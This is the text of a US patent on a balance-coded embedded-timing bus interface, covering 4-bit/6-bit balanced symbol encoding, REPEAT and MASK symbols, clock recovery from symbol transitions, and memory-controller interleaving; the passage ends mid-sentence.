Attorney Or Agent: Blakely, Sokoloff, Taylor & Zafman LLP
U.S. Class: 341/102; 341/58; 341/59; 341/60
Field Of Search: 341/102; 341/58; 341/59; 341/60; 341/51; 341/52; 341/81
U.S. Patent Documents: 5625644; 6151334; 6295010; 6477502

Abstract: An interface includes an encoder to receive a stream of input symbols and, in response, to output a corresponding stream of output symbols of substantially equal weight via multiple signal lines, which can improve noise/speed performance. The encoder outputs the stream of output symbols so that no output symbol is consecutively repeated. A repeat symbol is used to indicate that the current symbol is identical to the immediately preceding symbol. This encoding allows an interface receiving the stream of output symbols to extract a clock signal from the stream.

Claim: What is claimed is:

1. An interface unit, comprising: a first encoder to receive a stream of input symbols selected from a plurality of input symbols and, in response, to selectively output a corresponding stream of output symbols selected from a plurality of output symbols, each of the plurality of input symbols being associated with a corresponding output symbol of the plurality of output symbols, wherein no two consecutively outputted symbols of the stream of output symbols are identical.

2. The interface unit of claim 1 wherein all of the plurality of output symbols have a balanced weight.

3. The interface unit of claim 1 wherein, in response to consecutively receiving two identical input symbols, the first encoder to consecutively output two output symbols of the plurality of output symbols of which one is an output symbol indicating that the one of the two consecutively received input symbols is identical to the other.

4. The interface unit of claim 1 wherein the plurality of output symbols includes an output symbol that when outputted by the first encoder indicates that an input symbol received by the first encoder during one cycle is identical to another input symbol that was received during an immediately preceding cycle.

5. The interface unit of claim 1 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols.

6. The interface unit of claim 1 wherein the plurality of output symbols includes a symbol that when outputted by the first encoder functions as a mask signal.

7. The interface unit of claim 1 further comprising a plurality of output circuits coupled to the first encoder, wherein the plurality of output circuits each output a single-ended signal.

8. The interface unit of claim 1 wherein the first encoder is part of a memory controller.
9. The interface unit of claim 8 wherein the plurality of input symbols corresponds to a portion of a memory data word.

10. The interface unit of claim 9 further comprising a second encoder substantially similar to the first encoder, wherein an output symbol from the first encoder and an output symbol of the second encoder together represent a byte of a memory data word.

11. A method for transmitting data, the method comprising: receiving a stream of input symbols selected from a plurality of input symbols; selectively providing an output symbol corresponding to each received input symbol, each output symbol selected from a plurality of output symbols, each input symbol of the plurality of input symbols being represented by an output symbol of the plurality of output symbols; outputting a stream of the provided output symbols so that no two consecutively outputted symbols are the same.

12. The method of claim 11, wherein the plurality of output symbols are balanced equal weight output symbols.

13. The method of claim 11, wherein outputting a stream of provided output symbols further comprises selectively outputting two consecutive output symbols in response to a consecutive receiving of two identical input symbols, wherein one of the two consecutive output symbols is a symbol indicating that the one of the two consecutively received input symbols is identical to the other.

14. The method of claim 11 wherein the plurality of output symbols includes an output symbol that when outputted indicates that an input symbol received during one cycle is identical to another input symbol that was received during an immediately preceding cycle.

15. The method of claim 11 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols.

16. The method of claim 11 wherein the plurality of output symbols includes a symbol that when outputted functions as a mask signal.

17. The method of claim 11 wherein the stream of provided outputted symbols are outputted as single-ended signals.

18. The method of claim 11 wherein the stream of provided outputted signals are outputted as part of a memory interface.

19. The method of claim 18 wherein a symbol of the stream of input symbols corresponds to a portion of a memory data word.

20. The method of claim 19 further comprising outputting a second stream of output symbols selected from the plurality of output symbols, wherein an output symbol from the first stream of output symbols and an output symbol of the second stream of output symbols together represent a byte of a memory data word.

21. An apparatus for transmitting data, the apparatus comprising: means for receiving a stream of input symbols selected from a plurality of input symbols; means for selectively providing an output symbol corresponding to each received input symbol, each output symbol selected from a plurality of output symbols, each input symbol of the plurality of input symbols being represented by an output symbol of the plurality of output symbols; means for outputting a stream of the provided output symbols so that no two consecutively outputted symbols are the same.

22. The apparatus of claim 21, wherein the plurality of output symbols are balanced equal weight output symbols.
23. The apparatus of claim 21, wherein the means for outputting a stream of provided output symbols selectively outputs two consecutive output symbols in response to a consecutive receiving of two identical input symbols, wherein one of the two consecutive output symbols is a symbol indicating that the one of the two consecutively received input symbols is identical to the other.

24. The apparatus of claim 21 wherein the plurality of output symbols includes an output symbol that when outputted indicates that an input symbol received during one cycle is identical to another input symbol that was received during an immediately preceding cycle.

25. The apparatus of claim 21 wherein transitions between consecutive output symbols of the stream of output symbols correspond to transitions of a timing signal used to sample the outputted stream of output symbols.

26. The apparatus of claim 21 wherein the plurality of output symbols includes a symbol that when outputted functions as a mask signal.

27. The apparatus of claim 21 wherein the means for outputting outputs the stream of provided outputted symbols as single-ended signals.

28. The apparatus of claim 21 wherein the stream of provided outputted signals are outputted as part of a memory interface.

29. The apparatus of claim 28 wherein a symbol of the stream of input symbols corresponds to a portion of a memory data word.

30. The apparatus of claim 29 further comprising outputting a second stream of output symbols selected from the plurality of output symbols, wherein an output symbol from the first stream of output symbols and an output symbol of the second stream of output symbols together represent a byte of a memory data word.

31. A system, comprising: a processor; a memory; an interleaving unit coupled to the memory; and a memory controller coupled to the processor and the interleaving unit, the memory controller including a first encoder to receive a stream of N-bit symbols selected from a plurality of N-bit symbols and, in response, to selectively output to the interleaving unit a corresponding stream of M-bit symbols selected from a plurality of M-bit symbols, M being greater than N, each N-bit symbol of the plurality of N-bit symbols being associated with a corresponding M-bit symbol of the plurality of M-bit symbols, wherein no two consecutively outputted symbols of the stream of M-bit symbols are identical.

32. The system of claim 31 wherein the interleaving unit includes a decoder to decode a received M-bit symbol into the corresponding N-bit symbol.

33. The system of claim 31 wherein, in response to consecutively receiving two identical N-bit symbols, the first encoder to consecutively output two M-bit symbols selected from the plurality of M-bit symbols of which one is an output symbol indicating that the one of the two consecutively received N-bit symbols is identical to the other.

34. The system of claim 31 wherein the plurality of M-bit symbols includes an M-bit symbol that when outputted by the first encoder indicates that an N-bit symbol received by the first encoder during one cycle is identical to another N-bit symbol that was received during an immediately preceding cycle.

35. The system of claim 31 wherein transitions between consecutive M-bit symbols of the stream of M-bit symbols correspond to transitions of a timing signal used to sample the outputted stream of M-bit symbols.

36. The system of claim 31 wherein the plurality of M-bit symbols includes an M-bit symbol that when outputted by the first encoder functions as a mask signal.
37. The system of claim 31 wherein the interleaving unit includes a second encoder that is substantially similar to the first encoder of the memory controller, the second encoder to receive N-bit symbols selected from the plurality of N-bit symbols from the memory and to output corresponding M-bit symbols of the plurality of M-bit symbols to the memory controller, and wherein the memory controller includes a decoder to decode received M-bit symbols into corresponding N-bit signals.

38. The system of claim 37 wherein the interleaving unit includes a plurality of interleaving devices.

39. The system of claim 31 wherein the plurality of N-bit symbols corresponds to a portion of a memory data word.

40. The system of claim 39 wherein the memory controller further comprises a third encoder substantially similar to the first encoder, wherein an M-bit symbol from the first encoder and an M-bit symbol of the third encoder together represent a byte of a memory data word.

41. The system of claim 31 wherein the plurality of M-bit symbols are balanced equal weight symbols.

Description:

FIELD OF THE INVENTION

Embodiments of the invention relate generally to bus interfaces and, more specifically but not exclusively, to encoded bus interfaces.

BACKGROUND INFORMATION

Modern bus systems for use in high-performance systems (e.g., a processor system) can operate at 400 MHz or more. Such high-speed systems can be susceptible to noise (e.g., supply noise due to switching of the circuits used to drive signals on the bus lines). One solution is to use differential signaling schemes that help reduce sensitivity to common mode noise on the signal lines.

However, differential signaling schemes have the disadvantage of doubling the number of signal lines and transceivers compared to single-ended schemes. Thus, for some applications, differential signaling may be undesirable. For example, some modern buses are 64-bits wide for data, thereby requiring 128 data signal lines. This relatively large number of data signal lines (and the associated transceivers) occupies valuable area on the chip(s) and wiring substrate (e.g., motherboard), which tends to increase the cost and complexity of the system.

On the other hand, if single-ended signal lines are used, in addition to the aforementioned noise sensitivity, the bus interfaces driving the signals on the signal lines can be "unbalanced". That is, the number of logic low signals and logic high signals during a clock cycle may be different, resulting in a local net current flow in or out of a bus interface. This current flow can undesirably cause localized power supply noise (including simultaneous switching output (SSO) noise).

SUMMARY OF THE INVENTION

In accordance with aspects of embodiments of the present invention, an interface includes an encoder to receive a stream of input symbols and, in response, to output a corresponding stream of output symbols of substantially equal weight via multiple signal lines. In this context, a symbol refers to the value of a preselected set of bits propagated on a selected set of signal lines. This balance-coded interface allows for relatively fast bus frequency with relatively low simultaneous switching output (SSO) noise.

In accordance with another aspect of embodiments of the present invention, an interface receiving the stream of output symbols can extract a clock signal from the stream. In this aspect, the encoder outputs the stream of output symbols so that no output symbol is consecutively repeated.
In one embodiment, a repeat symbol is used to indicate that the current symbol is identical to the immediately preceding symbol. Thus, because no two consecutive output symbols are repeated, the receiving interface will be able to detect a signal transition on at least one of the signal lines. The receiving interface can use the detected transitions to generate a clock signal.

In still another aspect of the present invention, the encoder can output a MASK symbol to indicate that data is masked. This aspect can be advantageously used in memory applications, which typically define a mask bit in the interface.

In yet another aspect of the present invention, the interface can use symbols that are not used for data or mask symbols for command/control purposes. For example, in one embodiment, these "spare" symbols can be used to configure interconnect devices such as multiplexers and interleavers.

BRIEF DESCRIPTION OF THE DRAWINGS

Non-limiting and non-exhaustive embodiments of the present invention are described with reference to the following figures, wherein like reference numerals refer to like parts throughout the various views unless otherwise specified. FIGS. 1-1B are block diagrams illustrating exemplary systems that include a balance-coded embedded-timing interface according to an embodiment of the present invention. FIG. 2 is a diagram illustrating the pertinent timing of the interface depicted in FIG. 1B, according to one embodiment of the present invention. FIG. 3 is a diagram illustrating a 4-bit/6-bit balance-coded embedded-timing interface, according to an embodiment of the present invention. FIG. 4 is a diagram illustrating symbol assignments for the 4-bit/6-bit balance-coded embedded-timing interface of FIG. 3, according to one embodiment of the present invention. FIG. 5 is a block diagram illustrating one of the 4-bit/6-bit balance-coded embedded-timing codecs of FIG. 3, according to one embodiment of the present invention.

DETAILED DESCRIPTION OF PREFERRED EMBODIMENTS

FIG. 1 illustrates an exemplary system 100 with "generic" bus interface devices 101.sub.1 and 101.sub.2 having balance-coded embedded-timing coder/decoder (CODEC) 103.sub.1 and CODEC 103.sub.2, respectively. Bus interface devices 101.sub.1 and 101.sub.2 are coupled to a bus 109 having a data width of N bits. In this embodiment, system 100 supports bi-directional data traffic on bus 109. Bus 109 can be a terminated bus. In addition, in other embodiments, bus 109 may have additional lines for addressing and/or control so that the total width of bus 109 exceeds N bits. These additional lines need not be encoded.

CODECs 103.sub.1 and 103.sub.2 are each configured to encode a received stream of M-bit data symbols into N-bit data symbols to be transmitted onto bus 109, with N being greater than M. For reasons described below, N is constrained to be even in this embodiment. For example, in one embodiment, N is six and M is four (i.e., 4b-6b nibble encoding). In other embodiments, M is a multiple of four (corresponding to bytes or words) and N is the same multiple of six. In still other embodiments, M and N need not be multiples of four and six. CODECs 103.sub.1 and 103.sub.2 are also configured to decode a stream of N-bit data symbols received via bus 109 into corresponding M-bit data symbols. One example of 4b-6b encoding is summarized in the table of FIG. 4, described below.
In addition, in accordance with embodiments of the invention, CODEC 103.sub.1 encodes each M-bit input data symbol into an N-bit output data symbol with equal numbers of logic high and logic low bits. Symbols having equal numbers of logic high and logic low bits are referred to herein as being balanced. This balanced coding achieves a relatively low local SSO noise level compared to the typical unbalanced signaling used in some conventional interfaces. As a result, the interface can be operated at a relatively high rate (e.g., similar to the rates achievable in differential signaling) using about half the number of signal lines.

In a further refinement, the CODECs can be configured so that one of the "spare" N-bit symbols (i.e., a symbol not needed to define an M-bit data symbol) is used as a "REPEAT" symbol. This N-bit REPEAT symbol is used when a current M-bit data symbol to be encoded is identical to the previously encoded symbol. Thus, if a CODEC consecutively receives two identical M-bit data symbols, the CODEC will encode the first M-bit data symbol into the corresponding N-bit data symbol and the second M-bit data symbol into the REPEAT symbol. Consequently, the logic level of a signal on at least one signal line of bus 109 will transition with every transmitted symbol. The receiving interface device can be configured to generate a timing signal from the data lines of bus 109, using a transition on any of the data lines to toggle the timing signal. Thus, this embodiment advantageously eliminates the need for a signal line dedicated to the timing signal, thereby reducing the number of signal lines needed in bus 109 (two lines if the bus is differential). In addition, this timing signal is generated locally, thereby advantageously reducing skew compared to conventional timing systems that use global timing signals.

In the case of a third consecutive identical M-bit symbol being received by the CODEC, the CODEC would encode the M-bit symbol into the corresponding N-bit symbol (as is the case with the first M-bit symbol of the sequence). Therefore, the third N-bit symbol is again different from the preceding symbol, causing at least one logic level transition on bus 109 (so that the timing signal can be extracted).

FIG. 1A illustrates an exemplary memory system 100A with a memory controller 101A.sub.1 (that includes CODEC 103.sub.1), an interleaving unit 101A.sub.2 (that includes CODEC 103.sub.2) and a memory 120 having dual in-line memory modules (DIMMs) 122.sub.1 through 122.sub.L. The elements of memory system 100A are interconnected as follows. CODEC 103.sub.1 of memory controller 101A.sub.1 and CODEC 103.sub.2 of interleaving unit 101A.sub.2 are connected to N-bit bus 109. Interleaving unit 101A.sub.2 is connected to DIMMs 122.sub.1 through 122.sub.L of memory 120 via buses 124.sub.1 through 124.sub.L respectively. In this embodiment, buses 124.sub.1 through 124.sub.L are "non-encoded" single-ended buses, each being M-bits wide, as used in a typical conventional memory system.

This embodiment of memory system 100A operates as follows. To write data to memory 120, CODEC 103.sub.1 receives a stream of M-bit data symbols from a data source (not shown) and encodes them into a stream of N-bit data symbols (as described above in conjunction with FIG. 1). Memory controller 101A.sub.1 transmits the N-bit data symbols to interleaving unit 101A.sub.2 via bus 109. In one embodiment, bus 109 operates at a frequency that is L times the operating frequency of buses 124.sub.1 through 124.sub.L.
Because this is a point-to-point connection (no stubs), bus 109 is not restricted to industry standard memory speeds. For example, bus 109 can be operated at a relatively high rate compared to those conventional buses that have a load of L DIMMs. In this way, for each memory cycle (i.e., at the memory speed) on buses 124.sub.1 through 124.sub.L, memory controller 101A.sub.1 can access each of DIMMs 122.sub.1 through 122.sub.L via interleaving unit 101A.sub.2. For example, in one embodiment, memory controller 101A.sub.1 is configured to transmit L N-bit data symbols to interleaving unit 101A.sub.2, where each of the L N-bit data symbols is to be written into a corresponding DIMM of DIMMs 122.sub.1 through 122.sub.L of memory 120. Memory controller 101A.sub.1 can transmit these L N-bit data symbols to interleaving unit 101A.sub.2 during one memory cycle of memory 120. CODEC 103.sub.2 of interleaving unit 101A.sub.2 decodes the L N-bit data symbols into L M-bit data symbols. Interleaving unit 101A.sub.2 then outputs each decoded M-bit data symbol onto the corresponding bus of buses 124.sub.1 through 124.sub.L. In one embodiment, interleaving unit 101A.sub.2 can latch the L M-bit data symbols onto buses 124.sub.1 through 124.sub.L so that memory 120 can store the data from buses 124.sub.1 through 124.sub.L in DIMMs 122.sub.1 through 122.sub.L, respectively.

To read data, memory 120 causes an M-bit data symbol from each of DIMMs 122.sub.1 through 122.sub.L to be output on buses 124.sub.1 through 124.sub.L, respectively, during a memory cycle. Interleaving unit 101A.sub.2 receives these L M-bit data symbols on buses 124.sub.1 through 124.sub.L. CODEC 103.sub.2 encodes the L M-bit data symbols into L N-bit data symbols. In the duration of one memory cycle, interleaving unit 101A.sub.2 serially transmits the L N-bit data symbols to memory controller 101A.sub.1 via bus 109. As previously stated, in one embodiment bus 109 operates at L times the rate of buses 124.sub.1 through 124.sub.L.

In a further refinement, one or more "spare" N-bit symbols (i.e., not assigned as a data symbol corresponding to an M-bit data symbol) can be used to configure interleaving unit 101A.sub.2. For example, memory controller 101A.sub.1 can send an N-bit symbol that represents a command to configure interleaving unit 101A.sub.2 to operate with K DIMMs of L possible DIMMs that are installed as part of memory 120. Other examples include using N-bit symbol(s) to configure interleaving unit 101A.sub.2 for calibration control, timing control, driver control, receiver control, etc. In other embodiments, spare symbols can be defined as command delimiter symbols so that symbols that would normally be used as data symbols are defined as control or configuration symbols when transmitted between the command delimiter symbols.

In another embodiment, memory 120 can be logically divided into P sections with L/P DIMMs in each section. In this embodiment, interleaving unit 101A.sub.2 can function in part as a multiplexer so that a selected section can be interleaved. For example, in one embodiment, L can be eight and P can be two. Therefore, there are four DIMMs per section and, in this example, bus 109 is operated at four times the rate of buses 124.sub.1 through 124.sub.L to achieve "4.times." interleaving.
For example, to write data into the section that contains DIMMs 122.sub.1 through 122.sub.4, memory controller 101A.sub.1 can cause interleaving unit 101A.sub.2 to select buses 124.sub.1 through 124.sub.4 (as in a multiplexer) and then interleave four N-bit data symbols received from memory controller 101A.sub.1 to DIMMs 122.sub.1 through 122.sub.4 in a manner as described above.

FIG. 1B illustrates an exemplary computer system 100B that includes a processor 130, a memory controller 101B.sub.1 (that includes CODEC 103.sub.1), an interleaving unit 101B.sub.2, and a double data rate (DDR) memory 120B having four DIMMs 122.sub.1 through 122.sub.4. Interleaving unit 101B.sub.2 includes an interleaving device 132 (that includes CODEC 103.sub.2) and interleaving devices 134.sub.1 and 134.sub.2. In other embodiments, a single unit can provide the same interleaving functionality. In this embodiment, processor 130 communicates with memory controller 101B.sub.1 via a bus 132 having a data word width of K bits. Memory controller 101B.sub.1 communicates with interleaving unit 101B.sub.2 via bus 109, which in turn communicates with memory 120B via buses 124.sub.1 through 124.sub.4. In this embodiment, interleaving unit 101B.sub.2 communicates with DIMMs 122.sub.1 and 122.sub.2 of memory 120 via interleave devices 132 and 134.sub.1 and buses 136.sub.1, 124.sub.1 and 124.sub.2. Similarly, interleaving unit 101B.sub.2 communicates with DIMMs 122.sub.3 and 122.sub.4 of memory 120 via interleave devices 132 and 134.sub.2 and buses 136.sub.2, 124.sub.3 and 124.sub.4. The operation of computer system 100B is described below in conjunction with FIG. 2.

FIG. 2 illustrates the timing of bus 109 (FIG. 1B) in transferring data between memory controller 101B.sub.1 (FIG. 1B) and interleaving unit 101B.sub.2 (FIG. 1B), according to one embodiment of the present invention. Referring to FIGS. 1B and 2, memory 120B can be accessed as follows. In one embodiment, a word of data is 4.times.M bits wide (i.e., K=4M) so that each data word has four M-bit symbols. For example, M can be a nibble wide (e.g., 4 bits), so that K is 16 bits. With M=4, N is selected to be six in this example. With N=6, there are 20 balanced N-bit symbols, enough to represent all possible values of a nibble, with four extra balanced symbols for other purposes (e.g., REPEAT, MASK, etc. symbols). One implementation of such a 4-bit/6-bit scheme is described in more detail in conjunction with FIG. 3 below. In this example, the K-bit data word has four M-bit symbols indicated as nibble 1 through nibble 4 in FIG. 2, where nibble 1 has the same value as nibble 2. Further, in this example, the last M-bit symbol (i.e., nibble 4) is to be masked. Although a 16-bit word/bus width and 4-bit/6-bit symbol encoding are used in this embodiment, other embodiments may have a different combination of word sizes, symbol (both M-bit and N-bit) sizes, and bus widths. For example, a 16-bit word/bus width and 8-bit/11-bit symbol encoding can be used in another embodiment to reduce the number of lines (i.e., 22 lines for 8-bit/11-bit encoding vs. 24 lines for 4-bit/6-bit encoding).

CODEC 103.sub.1 receives the "first" K-bit data word and sequentially outputs four N-bit data symbols, with each N-bit data symbol representing an M-bit nibble of the K-bit data word. These N-bit symbols are shown as symbols 201-204 in FIG. 2, corresponding to nibble 1 through nibble 4 of the K-bit data word. As previously described, CODEC 103.sub.1 outputs the N-bit symbols as balanced symbols.
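The count of twenty follows from simple combinatorics: a 6-bit symbol is balanced when exactly three of its six bits are high, and C(6,3) = 20. A short Python check (the particular symbol-to-nibble assignments live in the patent's FIG. 4, which is not reproduced here, so the enumeration order below is arbitrary):

```python
from itertools import combinations

# Every 6-bit value with exactly three bits set is a balanced symbol.
balanced = [sum(1 << bit for bit in ones) for ones in combinations(range(6), 3)]
print(len(balanced))                          # 20
print([format(s, "06b") for s in balanced])   # '000111', '001011', ...
```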
In addition, as previously described, CODEC 103.sub.1 outputs these symbols so that no symbol is consecutively repeated. Thus, symbol 201 is the N-bit symbol corresponding to M-bit nibble 1, while symbols 203 and 204 are the N-bit symbols corresponding to M-bit nibbles 3 and 4. In this example, the M-bit nibble corresponding to N-bit symbol 202 has the same value as that of the nibble corresponding to symbol 201; thus, in accordance with this embodiment of the invention, symbol 202 is a REPEAT symbol. As previously described, the REPEAT symbol indicates that its corresponding nibble is the same as the previous nibble (i.e., nibble 1 in this example). Similarly, when CODEC 103.sub.1 receives the four M-bit symbols (i.e., nibbles in this example) of the next data word via bus 132 from processor 130, CODEC 103.sub.1 outputs corresponding N-bit symbols 201A, 202A, and so on. Memory controller 101B.sub.1 outputs the N-bit symbols from CODEC 103.sub.1 to interleaving unit 101B.sub.2. CODEC 103.sub.2 of interleaving unit 101B.sub.2 then decodes the N-bit symbols from memory controller 101B.sub.1 into M-bit symbols (i.e., 4-bit nibbles in this example). In this example, CODEC 103.sub.2 decodes: N-bit symbol 201 into M-bit nibble 1; N-bit symbol 202 (i.e., the REPEAT symbol) into M-bit nibble 2, identical to nibble 1; N-bit symbol 203 into M-bit nibble 3; and N-bit symbol 204 (i.e., the MASK symbol) into any nibble value (i.e., don't-care bits). In one embodiment, the don't-care bits are output as logic low bits. The decoded data symbols are shown as a waveform 220 in FIG. 2. In addition, in decoding the MASK symbol 204, CODEC 103.sub.2 asserts the MASK signal that is part of the interface of DDR memory 120B. The MASK signal is shown as a waveform 222 in FIG. 2. In this embodiment, decoding the N-bit symbols also includes CODEC 103.sub.2 generating a timing signal (i.e., a strobe signal in this example that is part of the interface of DDR memory 120B) from the received symbols. In this embodiment, each symbol causes a transition in the timing signal. CODEC 103.sub.2 can generate the timing signal from the received symbols because, as previously described, no two consecutively transmitted symbols are identical. Thus, at least one bit transitions between consecutively transmitted symbols. CODEC 103.sub.2 detects the bit transition(s) between symbols and uses the detected transitions to cause transitions in the timing signal. For example, in one embodiment, CODEC 103.sub.2 can include transition detector logic (e.g., see FIG. 5) that performs an XOR operation on the current symbol and the previous symbol to drive a flip-flop used in generating the timing signal. Any suitable transition detection circuitry can be used in other embodiments, including indirect timing generation using phase locked loop (PLL) circuits, delay locked loop (DLL) circuits, etc. The timing signal is shown as a waveform 224 in FIG. 2. In this embodiment, interleaving device 132 of interleaving unit 101B.sub.2 then provides the decoded M-bit symbols, MASK and timing signals to interleave devices 134.sub.1 and 134.sub.2 via buses 136.sub.1 and 136.sub.2, respectively. For example, in one embodiment, interleave device 132 is configured to provide: (a) the MASK signal, the timing signal, and the first and second decoded M-bit symbols of a data word to interleave device 134.sub.1; and (b) the MASK signal, the timing signal, and the third and fourth M-bit symbols of that data word to interleave device 134.sub.2.
In a standard parallel interface, the MASK, timing and data signals would be appropriately timed on bus 136.sub.1. In turn, interleave device 134.sub.1 is configured to provide over a standard parallel interface: (c) the received MASK signal, timing signal, and first M-bit symbol to DIMM 122.sub.1 via bus 124.sub.1; and (d) the received MASK signal, timing signal, and second M-bit symbol to DIMM 122.sub.2 via bus 124.sub.2. Similarly, interleave device 134.sub.2 is configured to provide: (e) the received MASK signal, timing signal, and third M-bit symbol to DIMM 122.sub.3 via bus 124.sub.3; and (f) the received MASK signal, timing signal, and fourth M-bit symbol to DIMM 122.sub.4 via bus 124.sub.4. When reading a data word from memory 120B, each of DIMMs 122.sub.1-122.sub.4 outputs its corresponding M-bit symbol of the addressed data word to interleaving unit 101B.sub.2. Interleave devices 134.sub.1 and 134.sub.2 provide the M-bit symbols received from DIMMs 122.sub.1-122.sub.4 to interleave device 132. Interleave device 132 then encodes the received M-bit symbols into N-bit symbols, which are then output to memory controller 101B.sub.1 via bus 109. Memory controller 101B.sub.1 then decodes the received N-bit symbols back into M-bit symbols, which can then be concatenated into a data word and output to processor 130 via bus 132. FIG. 3 illustrates a 4-bit/6-bit balance-coded embedded-timing interface, according to an embodiment of the present invention. CODECs 300.sub.1 and 300.sub.2 are similar to CODECs 103.sub.1 and 103.sub.2 (FIG. 1B) except that CODECs 300.sub.1 and 300.sub.2 are specifically 4-bit/6-bit CODECs. In this embodiment, CODEC 300.sub.1 has a 4-bit data interface that includes a STROBE line 301, a MASK line 303 and data lines 305.sub.1-305.sub.4. In addition, CODEC 300.sub.1 has a 6-bit data interface to bus 109 that includes lines 109.sub.1-109.sub.6. CODEC 300.sub.2 also has a 6-bit interface to bus 109 and a 4-bit data interface that includes a STROBE line 311, a MASK line 313 and data lines 315.sub.1-315.sub.4. CODECs 300.sub.1 and 300.sub.2 are each configured to encode received 4-bit data symbols (e.g., nibbles) into balanced 6-bit symbols and to decode received 6-bit symbols into 4-bit data symbols or nibbles. One exemplary encoding scheme is summarized in the table of FIG. 4. As seen in FIG. 4, there are twenty balanced symbols possible using 6-bit symbols. Sixteen of the balanced 6-bit symbols are used for defining 4-bit data symbols, leaving four extra balanced 6-bit symbols. For example, CODEC 300.sub.1 can receive 4-bit data symbols via lines 305.sub.1-305.sub.4, where transitions of the signal on STROBE line 301 indicate when to sample the data on lines 305.sub.1-305.sub.4. CODEC 300.sub.1 would then output the corresponding 6-bit symbol (according to the table of FIG. 4) onto lines 109.sub.1-109.sub.6 to CODEC 300.sub.2. CODEC 300.sub.2 can then decode the received 6-bit symbols according to the table of FIG. 4. Data flow in the opposite direction is performed in substantially the same manner except that CODEC 300.sub.2 performs the encoding and CODEC 300.sub.1 performs the decoding. One of the four extra balanced 6-bit symbols is used to define the aforementioned REPEAT symbol. In this embodiment, the REPEAT symbol is used as follows. If a CODEC consecutively receives two 4-bit symbols that are the same, the CODEC will output the REPEAT symbol for the second 4-bit symbol instead of outputting the 4-bit symbol's corresponding 6-bit symbol again.
In this way, there will be at least one transition on lines 109.sub.1-109.sub.6, which can be detected by the receiving CODEC to generate a STROBE signal. In this embodiment, another of the four extra balanced 6-bit symbols is used to define the aforementioned MASK symbol. For example, CODEC 300.sub.1 outputs the MASK symbol in response to the signal received on MASK line 303. In this embodiment, when the signal on MASK line 303 is asserted, CODEC 300.sub.1 is configured to ignore the signals on lines 305.sub.1-305.sub.4 and to output the MASK symbol according to the table of FIG. 4. CODEC 300.sub.2 decodes the received MASK symbol and in response asserts the signal on MASK line 313. The signals on lines 315.sub.1-315.sub.4 may remain the same as in the previous cycle or may be pulled up or down, depending on the design. Data flow in the opposite direction is performed in substantially the same manner except that CODEC 300.sub.2 performs the encoding and CODEC 300.sub.1 performs the decoding. The other two balanced 6-bit symbols are used to define control start and control end delimiters (i.e., CNTL_START and CNTL_END). These delimiters can be used to indicate that symbols received between the delimiters are control symbols. These control symbols can be used to configure devices in the data path (e.g., interleaving devices 132, 134.sub.1 and 134.sub.2 in FIG. 1B). FIG. 4 illustrates symbol assignments for the 4-bit balance-coded embedded-timing interface of FIG. 3, according to one embodiment of the present invention. Other assignments are illustrated in FIGS. 4A and 4B, which are defined so that the logic implementation may be simplified. For example, the definitions in FIGS. 4A and 4B are selected so that the first two bits of the symbol code match the first two bits of the "nibble definitions". In other embodiments, different symbol assignments can be used. FIG. 5 illustrates CODEC 300.sub.2 (FIG. 3), according to one embodiment of the present invention. This embodiment includes a symbol transition detector 501, decode logic 502 and encode logic 503. A delay circuit 505 can be included to adjust the phase of the STROBE signal. Transition detector 501 is connected to receive 6-bit symbols via lines 109.sub.1-109.sub.6. Transition detector 501 has an output line connected to an input lead of delay circuit 505, which has an output lead connected to STROBE line 311. Transition detector 501 can be implemented using any suitable logic to detect a transition on any of lines 109.sub.1-109.sub.6 and generate therefrom a transition on the signal being output to delay circuit 505. As previously described, transition detector 501 can include XOR logic to operate on the currently received 6-bit symbol and the previously received 6-bit symbol, with the XOR logic outputting a pulse in response to any transition on lines 109.sub.1-109.sub.6. This pulse is used to clock a flip-flop, which generates the STROBE signal. In one embodiment, because the 6-bit symbols must be balanced, the logic only needs to consider the three bits of the symbol that were at "1" and determine whether any of them changed. This approach can be less complex to implement. Decode logic 502 is also connected to receive 6-bit symbols via lines 109.sub.1-109.sub.6. In addition, decode logic 502 has output leads connected to MASK line 313 and to lines 315.sub.1-315.sub.4. Decode logic 502 can be implemented using any suitable logic to implement the symbol assignments of the table of FIG. 4. A software sketch of the REPEAT substitution and this transition-based strobe recovery follows.
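The sketch below is illustrative only: it substitutes REPEAT whenever the same codeword would otherwise be sent twice, then recovers a strobe edge at the receiver by XOR-ing consecutive line states, exactly the mechanism described above. The symbol values are invented, not the FIG. 4 assignments.

    using System;
    using System.Collections.Generic;

    class EmbeddedTimingSketch
    {
        const byte REPEAT = 0b000111; // stand-in for one of the four spare balanced symbols

        // Transmitter: never put the same 6-bit state on the lines twice in a row.
        static List<byte> Encode(IEnumerable<byte> dataSymbols)
        {
            var line = new List<byte>();
            int prevTx = -1;
            foreach (byte s in dataSymbols)
            {
                byte tx = (s == prevTx) ? REPEAT : s; // a third repeat flips back to the data symbol
                line.Add(tx);
                prevTx = tx;
            }
            return line;
        }

        static void Main()
        {
            // Three data symbols, the first two identical.
            var line = Encode(new byte[] { 0b101010, 0b101010, 0b110001 });

            bool strobe = false;   // flip-flop output
            int prevRx = 0;        // idle (all-low) line state
            byte lastData = 0;
            foreach (byte rx in line)
            {
                if ((rx ^ prevRx) != 0) strobe = !strobe;   // XOR transition detector clocks the flip-flop
                byte data = (rx == REPEAT) ? lastData : rx; // REPEAT decodes to the previous value
                Console.WriteLine($"line={Convert.ToString(rx, 2).PadLeft(6, '0')} " +
                                  $"data={Convert.ToString(data, 2).PadLeft(6, '0')} strobe={strobe}");
                lastData = data;
                prevRx = rx;
            }
        }
    }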
Encode logic 503 is connected to receive 4-bit data symbols from lines 315.sub.1-315.sub.4 and STROBE and MASK signals via lines 311 and 313. Encode logic 503 can be implemented using any suitable logic to implement the symbol assignments of the table of FIG. 4. In one embodiment, a control signal is asserted to enable transition detector 501 and decode logic 502 while substantially simultaneously disabling encode logic 503 so that CODEC 300.sub.2 can receive and decode 6-bit symbols from CODEC 300.sub.1 (FIG. 3). Conversely, when CODEC 300.sub.2 is to receive and encode 4-bit data symbols, this control signal can be de-asserted to disable transition detector 501 and decode logic 502 while enabling encode logic 503. In this embodiment, CODEC 300.sub.1 (FIG. 3) is implemented in substantially the same way as this embodiment of CODEC 300.sub.2. Although balance-coded embodiments are described above, the embedded-timing feature can be used in embodiments that do not use balance coding. Embodiments of a method and apparatus for a balance-coded embedded-timing interface are described herein. In the above description, numerous specific details are set forth (such as the number of bits, the state assignments, etc.) to provide a thorough understanding of embodiments of the invention. One skilled in the relevant art will recognize, however, that embodiments of the invention can be practiced without one or more of the specific details, or with other methods, components, materials, etc. In other 